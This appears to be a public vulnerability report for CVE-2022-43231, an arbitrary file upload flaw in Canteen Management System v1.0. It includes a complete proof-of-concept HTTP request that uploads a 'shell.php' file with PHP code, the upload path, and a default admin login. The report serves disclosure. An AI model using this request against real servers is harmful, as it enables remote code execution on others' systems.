Headline
CVE-2022-43231: bug_report/RCE-1.md at main · HKD01l/bug_report
Canteen Management System v1.0 was discovered to contain an arbitrary file upload vulnerability via /youthappam/manage_website.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file.
Permalink
Canteen Management System v1.0 by mayuri_k has arbitrary code execution (RCE)
BUG_Author: QiaoRui feng
vendors: https://www.sourcecodester.com/php/15688/canteen-management-system-project-source-code-php.html
The program is built using the xmapp-php8.1 version
Login account: [email protected]/rootadmin (Super Admin account)
Vulnerability url: ip/youthappam/manage_website.php
Loophole location: Canteen Management System’s manage_website.php file exists arbitrary file upload (RCE)
Request package for file upload:
POST /youthappam/manage_website.php HTTP/1.1 Host: 192.168.1.88 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Referer: http://192.168.1.88/youthappam/manage_website.php Cookie: PHPSESSID=lf9hph2449vgrcadcct2jgd8ne Connection: close Content-Type: multipart/form-data; boundary=---------------------------13868104343107 Content-Length: 1811 -----------------------------13868104343107 Content-Disposition: form-data; name="title" Admin Panel by -----------------------------13868104343107 Content-Disposition: form-data; name="footer" Admin PanelÃ� -----------------------------13868104343107 Content-Disposition: form-data; name="short_title" 9090908080 -----------------------------13868104343107 Content-Disposition: form-data; name="currency_code" India -----------------------------13868104343107 Content-Disposition: form-data; name="currency_symbol" ââ��¹ -----------------------------13868104343107 Content-Disposition: form-data; name="old_website_image" shell.php -----------------------------13868104343107 Content-Disposition: form-data; name="website_image"; filename="shell.php" Content-Type: application/octet-stream <?php phpinfo(); ?> -----------------------------13868104343107 Content-Disposition: form-data; name="old_invoice_image" logo.jpg -----------------------------13868104343107 Content-Disposition: form-data; name="invoice_image"; filename="" Content-Type: application/octet-stream -----------------------------13868104343107 Content-Disposition: form-data; name="old_login_image" logo.png -----------------------------13868104343107 Content-Disposition: form-data; name="login_image"; filename="" Content-Type: application/octet-stream -----------------------------13868104343107 Content-Disposition: form-data; name="old_back_login_image" logo.jpg -----------------------------13868104343107 Content-Disposition: form-data; name="back_login_image"; filename="" Content-Type: application/octet-stream -----------------------------13868104343107 Content-Disposition: form-data; name="btn_web" -----------------------------13868104343107–
The files will be uploaded to this directory \youthappam\assets\uploadImage\Logo\
We visited the directory of the file in the browser and found that the code had been executed